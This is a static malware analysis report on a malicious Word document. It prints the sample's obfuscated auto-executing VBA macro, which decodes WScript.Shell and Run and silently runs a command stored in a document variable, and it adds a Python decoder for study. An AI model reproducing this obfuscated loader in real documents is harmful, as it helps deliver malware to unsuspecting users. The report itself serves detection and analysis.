Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e26e15cc181d3ca…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 36.5 KB
Created: 2018-10-28 22:33:00
Authoring application: Microsoft Office Word
First seen: 2020-04-06
MD5: 441e1f32c93a73ea3dd3ad1951867dec
SHA-1: 9daa0fedc53972fce95b11394b8a9ee368c59130
SHA-256: 7e26e15cc181d3caec107bfd274e596064eef94dc11b3abde6738b53a0b6cd5b
Risk score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains obfuscated VBA macros with an auto-executing Document_Open subroutine. Document_Open is a Select Case over a variable hard-coded to 2; every branch other than Case 2 is arithmetic junk that assigns an unused local, and only Case 2 does real work. That branch calls CallByName on a CreateObject result, with both the ProgID and the method name produced at run time by the decoder function UOs_tIA, which reads its argument two hex digits at a time and subtracts 31 from each byte. Decoding the two literals in the source gives "WScript.Shell" for "76728291888F934D7287848B8B" and "Run" for "71948D", so the branch is equivalent to CreateObject("WScript.Shell").Run(<command>, 0, True): the command runs in a hidden window and the macro waits for it to finish. The command string itself is not present in the macro source; it is read from the document variable ZEUQO (ActiveDocument.Variables("ZEUQO").Value) and passed through the same decoder, so recovering the second-stage command or URL requires the document's variable storage, not just the extracted VBA. The p-code heuristic below reports download tokens alongside the execution tokens, consistent with a downloader that fetches and runs a second-stage payload, and the ClamAV detection Doc.Malware.Valyria-6749505-0 further supports the malicious verdict.

Heuristics (8)

  • ClamAV: Doc.Malware.Valyria-6749505-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-6749505-0.
  • VBA macros detected (medium, OLE_VBA_MACROS; 5 related findings)
    The document contains VBA macro code.
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    An auto-executing macro reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source as literal tokens. In this sample the decoder is UOs_tIA, which consumes its input two hex digits at a time and subtracts 31 from each value.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open is an auto-execution entry point: it runs as soon as the document is opened in Word with macros enabled, with no further user action.
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject instantiates a COM object from a ProgID; here the ProgID is produced by the decoder at run time rather than appearing as a literal.
  • CallByName call (high, OLE_VBA_CALLBYNAME)
    CallByName invokes a method given its name as a string, so the method name (also decoded at run time) never appears in the source as a literal token either.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI present in any Office document that contains drawing content; it is not an indicator of compromise.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 4117 bytes
    SHA-256: adcb37c7f56ad4b222dcbc0b5062ec957cd622639c45f03821a89196acc41f32

Extracted script preview (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function UOs_tIA(ByVal J_H As String)
Dim b_slV As String: Dim m_ik As Long: For m_ik = 1 To Len(J_H) Step 2: b_slV = b_slV & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(J_H, m_ik, 2)) - 31): Next: UOs_tIA = b_slV
End Function
Sub Document_Open()
Dim vSKrbYF_pczSQJnVW As Long: vSKrbYF_pczSQJnVW = 2
Dim xttL_cladmGvk As Long
Select Case vSKrbYF_pczSQJnVW
Case 48 - (68 + 82) - 61 Xor Round(4159 Xor 4344) Xor 79
xttL_cladmGvk = 8275 Xor 43
Case 41 Xor Round(2702 Xor 826) Xor 99 / Round(71 * 30 / 58) / 34 / Round(89 * 15 / 11) / 42
xttL_cladmGvk = 1282 * 33
Case 15 + (67 - 63) + 73 + (11 - 56) + 68
xttL_cladmGvk = 9183 + 78
Case 48 / Round(97 * 61 / 11) / 40 + (85 - 73) + 18 * Round(30 / 80 - 17) * 77
xttL_cladmGvk = 1387 + 41
Case 93 + (56 - 78) + 96 Xor Round(4979 Xor 1582) Xor 75
xttL_cladmGvk = 3328 Xor 35
Case 12 / Round(56 * 78 / 9) / 33 * Round(34 / 88 - 15) * 30
xttL_cladmGvk = 5691 * 16
Case 72 * Round(55 / 62 - 44) * 62 / Round(86 * 81 / 42) / 89 / Round(60 * 84 / 18) / 40
xttL_cladmGvk = 8756 Xor 12
Case 95 + (51 - 68) + 80 + (9 - 35) + 31 / Round(57 * 50 / 38) / 93
xttL_cladmGvk = 2725 * 87
Case 45 - (70 + 43) - 55 - (20 + 79) - 65
xttL_cladmGvk = 5109 + 36
Case 34 + (66 - 41) + 62 + (90 - 36) + 68
xttL_cladmGvk = 8400 + 67
Case 56 + (13 - 27) + 98 + (93 - 78) + 24
xttL_cladmGvk = 35 * 98
Case 10 * Round(43 / 29 - 30) * 86 * Round(17 / 79 - 16) * 86
xttL_cladmGvk = 3074 Xor 21
Case 65 + (31 - 92) + 35 + (73 - 62) + 47
xttL_cladmGvk = 1586 - 38
Case 99 * Round(32 / 45 - 35) * 90 / Round(18 * 28 / 39) / 35 * Round(24 / 40 - 9) * 91
xttL_cladmGvk = 2848 / 90
Case 88 * Round(32 / 44 - 40) * 93 / Round(57 * 28 / 30) / 46 * Round(38 / 92 - 78) * 68
xttL_cladmGvk = 751 + 78
Case 23 / Round(24 * 51 / 22) / 10 + (40 - 44) + 31 / Round(89 * 32 / 24) / 83
xttL_cladmGvk = 7049 * 27
Case 52 * Round(32 / 58 - 19) * 16 / Round(45 * 57 / 18) / 21 / Round(93 * 64 / 56) / 99
xttL_cladmGvk = 606 * 40
Case 2:
CallByName CreateObject(UOs_tIA("76728291888F934D7287848B8B")), UOs_tIA("71948D"), VbMethod, UOs_tIA(ActiveDocument.Variables("ZEUQO").Value), 0, True
Case 88 / Round(32 * 62 / 9) / 53 * Round(35 / 77 - 89) * 89
xttL_cladmGvk = 985 + 25
Case 85 * Round(77 / 70 - 46) * 90 - (55 + 23) - 72 + (10 - 97) + 69
xttL_cladmGvk = 4027 Xor 18
Case 12 / Round(35 * 9 / 12) / 74 Xor Round(4579 Xor 5285) Xor 80 - (78 + 20) - 74
xttL_cladmGvk = 3409 / 78
Case 81 - (72 + 88) - 92 - (71 + 34) - 61
xttL_cladmGvk = 1783 - 17
Case 46 - (26 + 66) - 31 - (59 + 71) - 28 + (27 - 57) + 52
xttL_cladmGvk = 548 - 87
Case 37 Xor Round(1302 Xor 3020) Xor 29 - (13 + 21) - 44
xttL_cladmGvk = 3224 Xor 56
Case 60 * Round(97 / 16 - 21) * 25 - (43 + 52) - 77
xttL_cladmGvk = 7582 + 10
Case 43 / Round(49 * 93 / 20) / 10 + (54 - 58) + 83 / Round(44 * 10 / 18) / 14
xttL_cladmGvk = 7469 Xor 92
Case 99 + (20 - 77) + 86 - (9 + 43) - 81 / Round(85 * 94 / 67) / 30
xttL_cladmGvk = 6978 + 67
Case 89 / Round(17 * 75 / 99) / 77 - (40 + 50) - 93 - (93 + 9) - 33
xttL_cladmGvk = 8268 - 58
Case 74 / Round(24 * 23 / 47) / 51 + (84 - 57) + 41
xttL_cladmGvk = 2410 - 68
Case 19 * Round(24 / 49 - 55) * 80 * Round(74 / 29 - 33) * 44
xttL_cladmGvk = 3400 + 49
Case 13 * Round(84 / 39 - 96) * 93 / Round(45 * 38 / 20) / 69 / Round(32 * 80 / 81) / 97
xttL_cladmGvk = 2550 + 88
Case 60 - (9 + 77) - 67 - (78 + 30) - 40
xttL_cladmGvk = 5107 - 21
Case 31 Xor Round(1952 Xor 4994) Xor 52 / Round(68 * 20 / 46) / 60
xttL_cladmGvk = 1671 / 89
Case 59 / Round(74 * 92 / 51) / 98 + (41 - 48) + 32
xttL_cladmGvk = 6502 * 68
Case 11 - (53 + 25) - 17 / Round(41 * 65 / 30) / 62
xttL_cladmGvk = 5452 * 51
Case 9 * Round(90 / 38 - 77) * 90 / Round(19 * 65 / 41) / 32
xttL_cladmGvk = 8327 Xor 78
End
... (truncated)
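Added worked example (not part of this report, of the sample, or of the oletools output): a Python reimplementation of the sample's UOs_tIA decoder that recovers the decoder parameters from the macro source instead of hard-coding them, decodes every literal argument passed to the decoder, and reports the arguments that cannot be resolved from the source alone. The macro excerpt embedded in the script is copied from the macros.bas listing above with the dead Case arms omitted; the Python function names are this example's own.

```python
import ast
import operator
import re

# Excerpt copied from the macros.bas listing in this report: the decoder and
# the single live branch (Case 2) of Document_Open. Junk Case arms omitted.
MACRO_SOURCE = r'''
Private Function UOs_tIA(ByVal J_H As String)
Dim b_slV As String: Dim m_ik As Long: For m_ik = 1 To Len(J_H) Step 2: b_slV = b_slV & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(J_H, m_ik, 2)) - 31): Next: UOs_tIA = b_slV
End Function
Sub Document_Open()
Dim vSKrbYF_pczSQJnVW As Long: vSKrbYF_pczSQJnVW = 2
Select Case vSKrbYF_pczSQJnVW
Case 2:
CallByName CreateObject(UOs_tIA("76728291888F934D7287848B8B")), UOs_tIA("71948D"), VbMethod, UOs_tIA(ActiveDocument.Variables("ZEUQO").Value), 0, True
End Select
End Sub
'''

DECODER_NAME = "UOs_tIA"

# Matches the decoder's core:  Chr(Val(Chr(<a>) & Chr(<b>) & Mid(...)) - <offset>)
# <a>/<b> are the arithmetic hiding the "&H" hex prefix; <offset> is the per-byte
# subtraction. Each capture allows one level of nested parentheses.
_ARITH = r"[^()]*(?:\([^()]*\)[^()]*)*"
DECODER_RE = re.compile(
    r"Chr\(Val\(Chr\((" + _ARITH + r")\)\s*&\s*Chr\((" + _ARITH + r")\)"
    r"\s*&\s*Mid\([^)]*\)\)\s*-\s*(\d+)\)"
)

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def eval_arith(expr: str) -> float:
    """Evaluate a + - * / constant expression without eval(); anything else is rejected."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        raise ValueError(f"unsupported syntax in {expr!r}")
    return walk(ast.parse(expr, mode="eval"))


def derive_decoder_params(src: str) -> tuple:
    """Return (prefix, offset) recovered from the decoder body, e.g. ("&H", 31)."""
    m = DECODER_RE.search(src)
    if not m:
        raise ValueError("decoder pattern not found")
    prefix = chr(int(eval_arith(m.group(1)))) + chr(int(eval_arith(m.group(2))))
    return prefix, int(m.group(3))


def decode_hex_offset(encoded: str, offset: int = 31) -> str:
    """UOs_tIA: for each two-hex-digit pair, emit Chr(Val("&H" & pair) - offset)."""
    if len(encoded) % 2:
        raise ValueError("odd-length hex string")
    return "".join(chr(int(encoded[i:i + 2], 16) - offset)
                   for i in range(0, len(encoded), 2))


def find_decoder_calls(src: str, name: str = DECODER_NAME) -> list:
    """Return the raw argument text of every decoder call (the definition is skipped)."""
    calls = []
    for m in re.finditer(r"(?<!Function )" + re.escape(name) + r"\(", src):
        depth, i = 1, m.end()
        while i < len(src) and depth:           # walk to the matching close paren
            depth += {"(": 1, ")": -1}.get(src[i], 0)
            i += 1
        calls.append(src[m.end():i - 1].strip())
    return calls


def recover_strings(src: str) -> tuple:
    """Decode every literal decoder argument; list the arguments that are not literals."""
    prefix, offset = derive_decoder_params(src)
    if prefix != "&H":
        raise ValueError(f"decoder uses prefix {prefix!r}, not hex")
    resolved, unresolved = {}, []
    for arg in find_decoder_calls(src):
        lit = re.fullmatch(r'"([0-9A-Fa-f]+)"', arg)
        if lit:
            resolved[lit.group(1)] = decode_hex_offset(lit.group(1), offset)
        else:
            unresolved.append(arg)   # e.g. a document variable: needs the file, not the source
    return resolved, unresolved


def is_shell_run_sink(resolved: dict) -> bool:
    """True when the decoded literals spell out the WScript.Shell / Run execution sink."""
    values = set(resolved.values())
    return "WScript.Shell" in values and "Run" in values


if __name__ == "__main__":
    resolved, unresolved = recover_strings(MACRO_SOURCE)
    for enc, dec in resolved.items():
        print(f"{enc} -> {dec!r}")
    for arg in unresolved:
        print(f"not recoverable from source: {arg}")
    print("WScript.Shell.Run sink:", is_shell_run_sink(resolved))
```

Run as-is it prints the two decoded literals, WScript.Shell and Run, and flags ActiveDocument.Variables("ZEUQO").Value as unresolvable: that argument is a document variable, so the final command line has to be pulled from the document's variable storage and then passed through decode_hex_offset with the same offset. The arithmetic evaluator is restricted to + - * / on constants so that junk expressions lifted from a hostile macro are never handed to eval().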